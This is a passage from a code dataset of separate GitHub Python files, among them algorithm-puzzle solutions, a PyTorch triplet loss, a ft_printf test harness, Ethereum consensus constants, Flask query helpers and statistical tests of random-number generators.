'cODEwARS'\n","repo_name":"suminv/codewar","sub_path":"swap_func.py","file_name":"swap_func.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41422307870","text":"def maxSubArrayNaive(nums):\n max_sum = max(nums)\n size = len(nums)\n idxs = [r for r in range(0, size)]\n sums = dict(zip(idxs, nums))\n for i in idxs:\n for j in idxs[:size-i]:\n if i != 0 and sums[j] > max_sum:\n max_sum = sums[j]\n if (j+i != size-1):\n sums[j] += nums[j+i+1]\n return max_sum\n\n\ndef maxSubArrayKadane(input):\n if len(input) == 0:\n return None\n maxSoFar = maxEndingHere = input[0]\n for idx, value in enumerate(input):\n if idx >= 1:\n maxEndingHere = max(value, maxEndingHere + value)\n if maxEndingHere > maxSoFar:\n maxSoFar = maxEndingHere\n return maxSoFar\n\n\ninput = [-2, 1, -3, 4, -1, 2, 1, -5, 4]\n\nprint(maxSubArrayKadane(input))\n","repo_name":"erchiggins/leet-april","sub_path":"max_subarray.py","file_name":"max_subarray.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9004310731","text":"from sys import stdin, stdout\n\ntests = int(stdin.readline())\n\nwhile tests > 0:\n tests -= 1\n\n n, k = map(int, stdin.readline().split())\n heights_map = map(int, stdin.readline().split())\n heights = list(heights_map)\n\n if n == 1:\n print(-1)\n continue\n\n heights.sort()\n heights.reverse()\n\n # list has two boxes taller than needed\n if heights[1] >= k:\n print(2)\n continue\n # list has one tall enough. remove it and compute the other\n # obviously, the one tall enough is first one\n elif heights[0] >= k:\n tracy = 0\n count = 1\n # pick that one and build another\n for i in range(1, len(heights)):\n count += 1\n tracy += heights[i]\n if tracy >= k:\n break\n\n if tracy >= k:\n print(count)\n else:\n print(-1)\n continue\n\n # no trivial cases present\n # compute DP to find out minimum needed to reach closest to k\n max_dp = k + heights[0]\n dp = [len(heights) + 1] * max_dp\n temp_dp = [len(heights) + 1] * max_dp\n prev = [-1] * (2 * k)\n\n heights_len = len(heights)\n\n for j in range(0, heights_len):\n for i in range(heights[j], max_dp):\n if i == heights[j]:\n dp[i] = 1\n prev[i] = j\n else:\n if (temp_dp[i - heights[j]] + 1) < dp[i]:\n dp[i] = temp_dp[i - heights[j]] + 1\n prev[i] = j\n for i in range(1, max_dp):\n temp_dp[i] = dp[i]\n\n least_count = (heights_len + 1) * 2.0\n count_found = False\n # find the combination with least no. of boxes\n for h in range(k, max_dp):\n if dp[h] < heights_len and dp[h] < (least_count / 2.0):\n # there's a potential combination\n # compute map with used up indices\n cur_height = h\n used_boxes = []\n cur_prev = prev[h]\n while cur_height > 0:\n used_boxes.append(cur_prev)\n cur_height -= heights[cur_prev]\n cur_prev = prev[cur_height]\n\n # now start in descending order and compute tracy's height\n tracy = 0\n count = 0\n box_idx = 0\n while tracy < k and box_idx < heights_len:\n if used_boxes.__contains__(box_idx):\n box_idx += 1\n else:\n count += 1\n tracy += heights[box_idx]\n box_idx += 1\n\n if tracy >= k and least_count > (dp[h] + count):\n count_found = True\n least_count = dp[h] + count\n if count_found:\n break\n\n if count_found:\n print(least_count)\n else:\n print(-1)\n","repo_name":"adit-t/competitive-programming","sub_path":"codechef/long-challenges/2021/jan/wipl.py","file_name":"wipl.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22070154585","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom ..registry import LOSSES\nfrom .utils import weighted_loss\nimport math\n\n\n@weighted_loss\ndef triplet_loss(distance, label, alpha):\n # distance: (n, num_class, num_mode)\n # label: (n, 1)\n if label.size(0) == 0:\n loss = torch.tensor(0.0).to(label.device)\n else:\n label_ = label-1\n cls_gt_idx = torch.zeros(distance.size(0), distance.size(1)).to(label_.device).scatter(1, label_, 1).byte()\n cls_other_idx = torch.ones(distance.size(0), distance.size(1)).to(label_.device).scatter(1, label_, 0).byte()\n dis_cls_gt = distance[cls_gt_idx].view(distance.size(0), -1, distance.size(2))\n dis_cls_other = distance[cls_other_idx].view(distance.size(0), -1, distance.size(2))\n dis_cls_gt_min = dis_cls_gt.min(1)[0].min(1)[0]\n dis_cls_other_min = dis_cls_other.min(1)[0].min(1)[0]\n loss = F.relu(dis_cls_gt_min - dis_cls_other_min + alpha)\n return loss\n\n\n@LOSSES.register_module\nclass TripletLoss(nn.Module):\n\n def __init__(self, alpha=0.3, reduction='mean', loss_weight=1.0):\n super(TripletLoss, self).__init__()\n self.alpha = alpha\n self.reduction = reduction\n self.loss_weight = loss_weight\n\n def forward(self,\n distance,\n label,\n weight=None,\n avg_factor=None,\n reduction_override=None,\n **kwargs):\n assert reduction_override in (None, 'none', 'mean', 'sum')\n reduction = (\n reduction_override if reduction_override else self.reduction)\n loss_repmet = self.loss_weight * triplet_loss(\n distance,\n label,\n weight,\n alpha=self.alpha,\n reduction=reduction,\n avg_factor=avg_factor,\n **kwargs)\n # loss_repmet = self.loss_weight * repmet_loss(\n # distance,\n # label,\n # alpha=self.alpha,\n # weight=weight)\n # print(loss_repmet)\n return loss_repmet\n","repo_name":"yrqs/DMNet","sub_path":"mmdet/models/losses/triplet_loss.py","file_name":"triplet_loss.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21864743427","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport argparse\nimport ctypes\nimport ctypes.util\nimport signal\nimport time\nimport subprocess\n\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\n# *************************************************************************** #\n# Retrieving functions to compare. #\n# *************************************************************************** #\n\nlibftprintf = ctypes.cdll.LoadLibrary(os.path.join(BASE_DIR, 'libftprintf.so'))\nlibc = ctypes.cdll.LoadLibrary(ctypes.util.find_library('c'))\n\nft_printf = libftprintf.ft_printf\nprintf = libc.printf\n\n# *************************************************************************** #\n# Defining texts. #\n# *************************************************************************** #\n\nclass Timeout:\n\n \"\"\"\n Context manager to handle operations taking to long time.\n Raises a TimeoutError in such case (that would have to be handled by a\n try/except block).\n \"\"\"\n \n def __init__(self, t=1, msg='This operation took too long'):\n self.t = t\n self.error_msg = msg\n\n def handle_timeout(self, signum, frame):\n raise TimeoutError(self.error_msg)\n\n def __enter__(self):\n if self.t != 0:\n signal.signal(signal.SIGALRM, self.handle_timeout)\n signal.setitimer(signal.ITIMER_REAL, self.t)\n #signal.alarm(self.t)\n\n def __exit__(self, type, value, traceback):\n signal.alarm(0)\n \ndef timeout_handler(fd):\n fd.write(str(-1))\n sys.exit(1)\n \n# *************************************************************************** #\n# Defining texts. #\n# *************************************************************************** #\n\nmsgs = {\n 'welcome': '{yllw}Welcome to this ft_printf testing tool!{rst}',\n 'global_head': '{grn}Welcome to this ft_printf test programm!{rst}',\n 'global_res': '{res}Global{rst} : [{res}%d{rst}/{grn}%d{rst}]',\n 'segv_res': '{res}Segv tests passed{rst} : [{res}%d{rst}/{grn}%d{rst}]',\n 'segv_case_res': '[{case}%r{rst}] -> [status : {res}%s{rst}]',\n 'subset_head': '*** Running \"{grn}%s{rst}\" tests. ***',\n 'subset_res':\n (\n '--- {res}%s{rst} results : [{res}%d{rst}/{grn}%d{rst}]. ---'\n ),\n 'test_normal_res': (\n '[case: #%s][{case}%r{rst}] -> [%s/%s]'\n '[{grn}%d{rst}/{res1}%d{rst}][{grn}%r{rst}/{res2}%r{rst}].'\n ),\n 'test_err': (\n '[case: #%s][{case}%r{rst}] -> [%s/%s]'\n '[{res1}%s{rst}/{res2}%s{rst}] ({res}%s{rst}).'\n ),\n 'exit_err': '{fail}%s cases exited non zero statuses.{rst}'\n}\n\n# *************************************************************************** #\n# Defining Tester class. #\n# *************************************************************************** #\n\n\nclass Tester:\n\n msgs = msgs\n\n def __init__(self, f1=printf, f2=ft_printf):\n self.f1 = f1\n self.f2 = f2 # function to test\n self.counters = {\n 'global_success': 0,\n 'global_tried': 0,\n 'local_success': 0,\n 'local_tried': 0,\n 'global_exit_err': 0,\n 'local_exit_err': 0,\n }\n\n def run(self, cases_generator=None, verbose=False, quiet=False,\n timeout=0.15):\n \"\"\"\n This is the main run() method. It will (or not) trigger other\n run submethods.\n \"\"\"\n print(colorize(self.msgs['welcome']))\n self.run_cmp_cases(cases_generator(), verbose=verbose, quiet=quiet,\n timeout=timeout)\n if self.counters['global_exit_err'] == 0:\n print('Running cases in current process...')\n cases = cases_generator()\n f = os.open(os.devnull, os.O_WRONLY)\n os.dup2(f, sys.stdout.fileno())\n for s in cases:\n for c in s['cases']:\n self.f2(*c)\n os.close(f)\n os.dup2(2, sys.stdout.fileno())\n l = subprocess.call(['leaks', str(os.getpid())])\n if l == 0:\n print(colorize('{succ}No leak found.{rst}'))\n elif l > 1:\n print(colorize('{fail}An error occured with leaks.{rst}'))\n else:\n print(colorize('{fail}Leaks found.{rst}'))\n else:\n print(colorize(\n (\n '\\n{red}Some subprocesses failed (non 0 exit statuses)'\n 'Leaks tests failed.{rst}\\n'\n )))\n\n def run_cmp_cases(self, cases, verbose=False, quiet=False, debug=False,\n timeout=0.15):\n \"\"\"\n This run submethod just run test sets by calling run_in_subprocess().\n \"\"\"\n self.counters['global_tried'] = 0\n self.counters['global_success'] = 0\n for case in cases:\n self.run_cmp_cases_subsets(case['name'], case, verbose=verbose,\n quiet=quiet, timeout=timeout)\n if self.counters['global_tried'] > 0:\n success = self.counters['global_tried'] == self.counters[\n 'global_success'\n ]\n col = colors['succ'] if success else colors['fail']\n print(\n colorize(self.msgs['global_res'], {'res': col})\n % (\n self.counters['global_success'],\n self.counters['global_tried'],\n )\n )\n if (self.counters['local_exit_err'] != 0):\n print(colorize(self.msgs['exit_err'])\n % (\n self.counters['local_exit_err']\n ))\n\n def run_cmp_cases_subsets(self, name, cases, verbose=False, quiet=False,\n timeout=0.15):\n \"\"\"\n This run submethod just run test subsets by calling\n run_in_subprocess().\n \"\"\"\n self.counters['local_tried'] = 0\n self.counters['local_success'] = 0\n self.counters['local_exit_err'] = 0\n print(colorize(self.msgs['subset_head'], {}) % (cases['name'],))\n for case in cases['cases']:\n self.run_cmp_case(name, case, verbose=verbose, quiet=quiet,\n timeout=timeout)\n if self.counters['local_tried'] > 0:\n success = (\n self.counters['local_tried'] == self.counters['local_success']\n )\n col = colors['succ'] if success else colors['fail']\n print(colorize(self.msgs['subset_res'], {'res': col})\n % (\n cases['name'],\n self.counters['local_success'],\n self.counters['local_tried']\n ))\n if (self.counters['local_exit_err'] != 0):\n print(colorize(self.msgs['exit_err'])\n % (\n self.counters['local_exit_err']\n ))\n\n \n def run_cmp_case(self, name, case, verbose=False, quiet=False,\n timeout=0.15):\n \"\"\"\n This method just runs an actual test by calling\n run_in_subprocess().\n \"\"\"\n res = {\n 'f1': self.run_in_fork(self.f1, case, timeout=timeout),\n 'f2': self.run_in_fork(self.f2, case, timeout=timeout)\n }\n self.interpret_cmp_results(case, res, verbose, quiet)\n print('results : local (%s) : [%s/%s], global : [%s/%s]' % (\n name,\n self.counters['local_success'],\n self.counters['local_tried'],\n self.counters['global_success'],\n self.counters['global_tried']\n ), end='\\r')\n\n \n def run_in_fork(self, function, case, timeout=0.15):\n \"\"\"\n This method runs a test case by passing it to both f1 and f2,\n and by running it in subprocesses.\n It monitors the output on STDOUT, the function's return and the\n child process exit status..\n \"\"\"\n pipes = {}\n pipes['output_r'], pipes['output_w'] = os.pipe()\n pipes['return_r'], pipes['return_w'] = os.pipe()\n pid = os.fork()\n if (pid < 0):\n raise Exception('unable to fork')\n elif (pid == 0):\n try:\n with Timeout(t=5) as t:\n os.close(pipes['output_r'])\n os.close(pipes['return_r'])\n os.dup2(pipes['output_w'], sys.stdout.fileno())\n return_fd = os.fdopen(pipes['return_w'], 'bw')\n #signal.signal(signal.SIGTERM, lambda s, f: handle_timeout(return_fd))\n ret = function(*case)\n except TimeoutError as e:\n pass\n finally:\n os.close(pipes['output_w'])\n return_fd.write(str(ret).encode('utf-8'))\n return_fd.close()\n sys.exit()\n else:\n res = {}\n res['status'] = 'timeout'\n res['output'] = ''\n res['return'] = -1\n os.close(pipes['output_w'])\n os.close(pipes['return_w'])\n # output_in = os.fdopen(pipes['output_r'], encoding='cp1252')\n output_in = os.fdopen(pipes['output_r'], mode='rb')#, encoding='utf8')\n return_in = os.fdopen(pipes['return_r'])\n try:\n with Timeout(t=timeout) as t:\n res['status'] = os.waitpid(pid, 0)[1]\n if res['status'] == 0:\n res['output'] = output_in.read()\n tmp = return_in.read()\n res['return'] = int(tmp)\n except TimeoutError as e:\n os.kill(pid, signal.SIGTERM)\n os.waitpid(pid, 0)\n finally:\n output_in.close()\n return_in.close()\n return res\n\n\n \n def interpret_cmp_results(self, case, res, verbose=False, quiet=False):\n \"\"\"\n This method manges the display of the results for comparison tests.\n It also stores the success/failure to count it in the final ratio.\n \"\"\"\n self.counters['local_tried'] += 1\n self.counters['global_tried'] += 1\n cols = {}\n m = None\n if res['f2']['status'] != 0:\n self.counters['global_exit_err'] += 1\n self.counters['local_exit_err'] += 1\n if (res['f1']['status'] == 0 and res['f2']['status'] == 0):\n out_ok = (res['f1']['output'] == res['f2']['output'])\n ret_ok = (res['f1']['return'] == res['f2']['return'])\n cols['res2'] = colors['succ'] if out_ok else colors['fail']\n cols['res1'] = colors['succ'] if ret_ok else colors['fail']\n if ret_ok and out_ok:\n self.counters['local_success'] += 1\n self.counters['global_success'] += 1\n if (not (ret_ok and out_ok)) or verbose and not quiet:\n m = (colorize(self.msgs['test_normal_res'], cols)\n % (\n self.counters['global_tried'],\n ', '.join([str(i) for i in case]),\n self.f1.__name__,\n self.f2.__name__,\n res['f1']['return'],\n res['f2']['return'],\n res['f1']['output'],\n res['f2']['output']\n ))\n elif (res['f1']['status'] == res['f2']['status']):\n cols['res1'] = colors['succ']\n cols['res2'] = colors['succ']\n cols['res'] = colors['ntrl']\n m = (colorize(self.msgs['test_err'], cols)\n % (\n self.counters['global_tried'],\n ', '.join([str(i) for i in case]),\n self.f1.__name__,\n self.f2.__name__,\n res['f1']['status'],\n res['f2']['status'],\n 'error on both case.'\n ))\n else:\n cols['res1'] = colors['succ']\n cols['res2'] = colors['fail']\n cols['res'] = colors['fail']\n m = (colorize(self.msgs['test_err'], cols)\n % (\n self.counters['global_tried'],\n ', '.join([str(i) for i in case]),\n self.f1.__name__,\n self.f2.__name__,\n res['f1']['status'],\n res['f2']['status'],\n 'different exit statuses.'\n ))\n if m and not quiet:\n print(m)\n\n# *************************************************************************** #\n\nif __name__ == '__main__':\n\n # *********************************************************************** #\n # Check Python version #\n # *********************************************************************** # \n\n # try:\n # assert sys.version_info >= (3,6)\n # except AssertionError as e:\n # print(\"Wrong version : Python >= 3.6 required\")\n # sys.exit(1)\n \n # *********************************************************************** #\n # Argument parser definition #\n # *********************************************************************** #\n\n parser = argparse.ArgumentParser(\n description='This is a ft_printf python testing tool.')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='this option enables successful results display.')\n parser.add_argument('-q', '--quiet', action='store_true',\n help=('this option disables any case results display.'\n 'It permits to have a short yet global view on '\n 'every test set result'))\n parser.add_argument('-u', '--uncolored', dest='colors',\n action='store_false', help='disable colors.')\n parser.add_argument('-t', '--timeout', dest='t',\n type=float, default=0.25,\n help=(\n 'Set timeout duration. 0 will disable short '\n 'timeout (but a default 5 seconds timeout is still'\n ' activated to clean any non-terminated'\n ' subprocess if the parent process can\\'t kill'\n 'it in case of timeout).'\n ))\n parser.add_argument('filename',\n help=(\n 'A valid python3 file containing a generator '\n 'called \"cases_generator\". This iterable will '\n 'contain several case sets that will be '\n 'dictionnaries. These dictionaries will have a'\n '\\'name\\' entry to describe the cases subset, and'\n ' a \\'cases\\' entry '\n ))\n args = parser.parse_args()\n\n # *********************************************************************** #\n # importing cases #\n # *********************************************************************** #\n\n version = (sys.version_info.major, sys.version_info.minor)\n if (version == (3, 4) or version >= (3, 6)):\n from importlib.machinery import SourceFileLoader\n m = SourceFileLoader(\n \"module.name\",\n os.path.abspath(args.filename)).load_module()\n elif (version == (3, 5)):\n import importlib.util\n spec = importlib.util.spec_from_file_location(\n \"module.name\", os.path.abspath(args.filename))\n m = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(m)\n else:\n print(\"Python version not supported (<3.4)\")\n sys.exit(1)\n cases_generator = m.cases_generator\n \n # *********************************************************************** #\n # Colors definition #\n # *********************************************************************** #\n\n def colored(s):\n return (s if args.colors else '')\n\n colors = {\n 'red': colored('\\033[91m'),\n 'cyan': colored('\\033[96m'),\n 'blue': colored('\\033[94m'),\n 'prpl': colored('\\033[95m'),\n 'grn': colored('\\033[92m'),\n 'yllw': colored('\\033[93m'),\n 'rst': colored('\\033[0m'),\n }\n\n colors['succ'] = colors['grn']\n colors['fail'] = colors['red']\n colors['case'] = colors['prpl']\n colors['ntrl'] = colors['yllw']\n\n def colorize(s, res={}):\n cols = colors\n cols.update(res)\n return (s.format(**cols))\n\n # *********************************************************************** #\n # Test sets defintion #\n # *********************************************************************** #\n\n t = Tester(printf, ft_printf)\n t.run(cases_generator=cases_generator,\n verbose=args.verbose, quiet=args.quiet, timeout=args.t)\n","repo_name":"vmonteco/YAPT","sub_path":"yapt.py","file_name":"yapt.py","file_ext":"py","file_size_in_byte":17431,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"26238024526","text":"# https://github.com/ethereum/consensus-specs/blob/dev/specs/phase0/beacon-chain.md#misc\nfrom enum import Enum\n\nFAR_FUTURE_EPOCH = 2 ** 64 - 1\nJUSTIFICATION_BITS_LENGTH = 4\nMAX_VALIDATORS_PER_COMMITTEE = 2 ** 11\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/phase0/beacon-chain.md#time-parameters-1\nMIN_VALIDATOR_WITHDRAWABILITY_DELAY = 2**8\nSHARD_COMMITTEE_PERIOD = 256\nMIN_ATTESTATION_INCLUSION_DELAY = 2**0\nSLOTS_PER_EPOCH = 2**5\nMIN_SEED_LOOKAHEAD = 2**0\nMAX_SEED_LOOKAHEAD = 2**2\nMIN_EPOCHS_TO_INACTIVITY_PENALTY = 2**2\nEPOCHS_PER_ETH1_VOTING_PERIOD = 2**6\nSLOTS_PER_HISTORICAL_ROOT = 2**13\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/phase0/beacon-chain.md#state-list-lengths\nEPOCHS_PER_HISTORICAL_VECTOR = 2**16\nEPOCHS_PER_SLASHINGS_VECTOR = 2**13\nHISTORICAL_ROOTS_LIMIT = 2**24\nVALIDATOR_REGISTRY_LIMIT = 2**40\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/phase0/beacon-chain.md#rewards-and-penalties\nPROPORTIONAL_SLASHING_MULTIPLIER_BELLATRIX = 3\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/phase0/beacon-chain.md#gwei-values\nEFFECTIVE_BALANCE_INCREMENT = 2 ** 0 * 10 ** 9\nMAX_EFFECTIVE_BALANCE = 32 * 10 ** 9\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/capella/beacon-chain.md#execution\nMAX_WITHDRAWALS_PER_PAYLOAD = 2 ** 4\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/phase0/beacon-chain.md#withdrawal-prefixes\nETH1_ADDRESS_WITHDRAWAL_PREFIX = '0x01'\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/phase0/beacon-chain.md#validator-cycle\nMIN_PER_EPOCH_CHURN_LIMIT = 2 ** 2\nCHURN_LIMIT_QUOTIENT = 2 ** 16\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/phase0/beacon-chain.md#max-operations-per-block\nMAX_ATTESTATIONS = 2 ** 7\n\n# https://github.com/ethereum/consensus-specs/blob/dev/specs/altair/beacon-chain.md#sync-committee\nSYNC_COMMITTEE_SIZE = 2 ** 9\nBYTES_PER_LOGS_BLOOM = 2 ** 8\nMAX_EXTRA_DATA_BYTES = 2 ** 5\n\n\n# Local constants\nGWEI_TO_WEI = 10 ** 9\nSHARE_RATE_PRECISION_E27 = 10**27\nTOTAL_BASIS_POINTS = 10000\n\nMAX_BLOCK_GAS_LIMIT = 30_000_000\n\n\nclass Chain(Enum):\n MAINNET = \"mainnet\"\n GOERLI = \"goerli\"\n SEPOLIA = \"sepolia\"","repo_name":"NilFoundation/zkllvm-template","sub_path":"storage-proof-app/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"2572012382","text":"from models import app, db, Country, Disaster, Organization\nfrom schemas import (\n DisasterSchema,\n DisasterInstanceSchema,\n CountrySchema,\n CountryInstanceSchema,\n OrganizationSchema,\n OrganizationInstanceSchema,\n country_schema,\n disaster_schema,\n organization_schema,\n)\nimport flask_sqlalchemy\nfrom sqlalchemy import or_\nfrom query_finder import *\n\n\ndef search_countries(query, q):\n if q == None:\n return query\n\n queries = q.split(\" \")\n print(queries)\n\n items = []\n for item in queries:\n items.append(Country.name.ilike(\"%{}%\".format(item)))\n items.append(Country.languages.ilike(\"%{}%\".format(item)))\n items.append(Country.currencies.ilike(\"%{}%\".format(item)))\n items.append(Country.region.ilike(\"%{}%\".format(item)))\n items.append(Country.subregion.ilike(\"%{}%\".format(item)))\n\n query = query.filter(or_(*tuple(items)))\n return query\n\n\ndef filter_countries(query, queries):\n language = get_query(\"language\", queries)\n currency = get_query(\"currency\", queries)\n region = get_query(\"region\", queries)\n subregion = get_query(\"subregion\", queries)\n\n if language != None:\n query = query.filter(Country.languages.ilike(\"%{}%\".format(language[0])))\n\n if currency != None:\n query = query.filter(Country.currencies.ilike(\"%{}%\".format(currency[0])))\n\n if region != None:\n query = query.filter(Country.region.in_(region))\n\n if subregion != None:\n query = query.filter(Country.subregion.in_(subregion))\n\n return query\n\n\ndef sort_countries(sort, query):\n # sort = sort.split(\"-\")\n\n category = None\n if sort == \"name\":\n category = Country.name\n elif sort == \"population\":\n category = Country.population\n else:\n category = Country.id\n\n return query.order_by(category)\n","repo_name":"amodica/Diminishing-Disasters","sub_path":"backend/Country.py","file_name":"Country.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35841445423","text":"import random\nfrom matplotlib import pyplot as plt\n\nfrom chi_squarred import chi_squared_uniform, chi_squared_continuous, split_in_groups\nfrom gap import gap_test_discrete, gap_test_continue\nfrom kolmogorov_smirnov import kolmogorov_smirnov\nfrom poker import poker_test\nfrom generators import *\n\n\ndef open_file():\n with open(\"exp.txt\", \"r\") as e:\n for line in e:\n line = line.strip()\n if \".\" in line:\n line = line.split(\".\")[1]\n for c in line:\n yield int(c)\n\n\nif __name__ == '__main__':\n ## Répartition des décimales d’exponentielle\n ### Premier aperçu\n e_numbers = np.array(list(open_file()))\n print(f\"Les 2.000.000 premières décimales :\\n\"\n f\"{e_numbers}\")\n e_labels, e_counts = np.unique(e_numbers, return_counts=True)\n print(f\"Les chiffres apparaissant dans les décimales :\\n\"\n f\"{e_labels}\")\n print(f\"Leur fréquences d\\'apparition : \\n\"\n f\"{e_counts}\")\n df_e_numbers = {\"decimals\": e_numbers}\n plt.figure()\n plt.bar(e_labels, e_counts, color='palegreen')\n plt.savefig('histo_exp.png')\n plt.show()\n\n ### Test du Chi Carré\n print(f\"Test du Chi-Carré pour les décimales : \\n\"\n f\"{chi_squared_uniform(e_counts)}\")\n\n ### Test du Poker\n print(f\"Test du Poker pour les décimales : \\n\"\n f\"{poker_test(e_numbers)}\")\n\n ### Test du gap\n print(f\"Test du Gap pour les décimales : \\n \"\n f\"{gap_test_discrete(e_numbers, 0, 5)}\")\n\n ## Générateurs de nombres aléatoires\n\n ### Comparaison avec le générateur de Python\n python_numbers = []\n for _ in range(2000):\n python_numbers.append(random.uniform(0, 1))\n\n ### Techniques employées\n rng1 = Generator1(50)\n rng2 = Generator2(50)\n rng3 = Generator3(50)\n gen_numbers_1 = [rng1.random() for _ in range(2000)]\n gen_numbers_2 = [rng2.random() for _ in range(2000)]\n gen_numbers_3 = [rng3.random() for _ in range(2000)]\n\n print(f\"Résultats des générateurs : \\n\"\n f\"Générateur 1 : {split_in_groups(gen_numbers_1)} \\n\"\n f\"Générateur 2 : {split_in_groups(gen_numbers_2)} \\n\"\n f\"Générateur 3 : {split_in_groups(gen_numbers_3)} \\n\")\n\n ### Test du Chi Carré\n print(f\"Test du Chi Carré de nos générateurs : \\n\"\n f\"1 --> {chi_squared_continuous(gen_numbers_1)} \\n\"\n f\"2 --> {chi_squared_continuous(gen_numbers_2)} \\n\"\n f\"3 --> {chi_squared_continuous(gen_numbers_3)} \\n\"\n f\"Python -- > {chi_squared_continuous(python_numbers)}\")\n\n ### Test de Kolmogorov-Smirnov\n print(f\"Test de Kolmogorov-Smirnov pour notre générateur : \\n\"\n f\"1 --> {kolmogorov_smirnov(gen_numbers_1)} \\n\"\n f\"2 --> {kolmogorov_smirnov(gen_numbers_2)} \\n\"\n f\"3 --> {kolmogorov_smirnov(gen_numbers_3)} \\n\"\n f\"Python --> {kolmogorov_smirnov(python_numbers)}\")\n\n ### Test du gap\n print(f\"Test du gap pour notre générateur : \\n\"\n f\"1 --> {gap_test_continue(gen_numbers_1, 0.0, 0.5)} \\n\"\n f\"2 --> {gap_test_continue(gen_numbers_2, 0.0, 0.5)} \\n\"\n f\"3 --> {gap_test_continue(gen_numbers_3, 0.0, 0.5)} \\n\"\n f\"Python --> {gap_test_continue(python_numbers, 0.0, 0.5)}\")\n\n plt.figure()\n plt.hist(gen_numbers_1, color='palegreen', histtype='barstacked')\n plt.hist(python_numbers, color='darkblue', histtype='step')\n plt.legend({'Premier générateur', 'Python'}, loc=4)\n plt.savefig('generator1.png')\n plt.show()\n\n plt.figure()\n plt.hist(gen_numbers_2, color='palegreen', histtype='barstacked')\n plt.hist(python_numbers, color='darkblue', histtype='step')\n plt.legend({'Second générateur', 'Python'}, loc=4)\n plt.savefig('generator2.png')\n plt.show()\n\n plt.figure()\n plt.hist(gen_numbers_3, color='palegreen', histtype='barstacked')\n plt.hist(python_numbers, color='darkblue', histtype='step')\n plt.legend({'Troisième générateur', 'Python'}, loc=4)\n plt.savefig('generator3.png')\n plt.show()\n","repo_name":"laurencefloriani/simulation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37020356903","text":"from pathlib import Path\n\n### Dataset config ###\npath_dataset = Path(\"/home/yy/Coding/datasets/cifar10\")\n# path_dataset = Path(\"/home/wty/Coding/datasets/cifar10\")\nbatch_size = 128\nshuffle_size = 128 * 16\nimage_shape = (32, 32, 3)\nrepeat = 20\nuse_aug = True\ntrain_data_size = 50000 * repeat\n\n### Model config ###\nclass_num = 10\nencoder_stage_size = (3, 4, 6, 3)\n# encoder_stage_size = (2, 4, 4, 2)\ndecoder_stage_size = encoder_stage_size[::-1]\nfeature_size = 2048\n\n### Training config ###\ntotal_epochs = 5\n# learning_rate = 0.001\nlearning_rate = 5e-4\ncoef_kl_loss = 2.5e-3\n# coef_kl_loss = 1e-4\ncoef_cls_loss = 20.0\nflag_l2_image_loss = True\nflag_cosine_schedule = True\n","repo_name":"wty-yy/KataCV","sub_path":"katacv/G_VAE/constant_cifar10.py","file_name":"constant_cifar10.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38122890920","text":"#sorting\ndef isCovered(ranges, left, right):\n # Sort the ranges\n ranges.sort()\n\n # Initialize coverage with `left`\n coverage = left\n\n # Check each range\n for start, end in ranges:\n # If the start of the range can extend the coverage\n if start <= coverage + 1:\n # Update the coverage\n coverage = max(coverage, end)\n # If the coverage is greater than `right`\n if coverage >= right:\n # Return True since we have covered the entire required range\n return True\n\n # If we have not returned True by now, not all integers are covered\n return False\n\n#time O(nlogn)\n#space O(1)\n","repo_name":"0xspringtime/leetcode","sub_path":"1893n.py","file_name":"1893n.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25841276281","text":"''' 따뜻한 날씨 찾기 \nGiven a list of daily temperatures T, return a list such that, \nfor each day in the input, tells you how many days you would have to wait until a warmer temperature. \nIf there is no future day for which this is possible, put 0 instead.\n\nFor example, given the list of temperatures T = [73, 74, 75, 71, 69, 72, 76, 73], \nyour output should be [1, 1, 4, 2, 1, 1, 0, 0].\n\nNote: \n* The length of temperatures will be in the range [1, 30000]. \n* Each temperature will be an integer in the range [30, 100].\n'''\n\n# 인덱스 스택을 쌓아가며 매시점 기온비교\ndef warmdays(T:list) -> list:\n answer = [0] * len(T) # 디폴트값을 0 으로 미리 채워둠 \n stack = []\n for i, cur in enumerate(T):\n while stack and cur > T[stack[-1]] : # stack의 마지막 인덱스에서의 온도보다 현재온도가 높으면\n last = stack.pop() \n answer[last] = i - last # 더 따뜻한 날과 해당 날의 일수 차 \n stack.append(i)\n return answer\n# stack에서 pop되지 못한(보다 높은 기온이 없는경우) index부분의 answer는 0이 됨.\n\n# 1개의 루프와 STACK을 이용한 조건부 순회로 시간복잡도 줄이기 \n# 특정시점 이후 모든 요소들에 접근하지 않고 1번의 비교로 해결되는 경우가 있으므로 \n# 시간을 단축할 수 있는 것.\n\n\n\n# 시간 초과 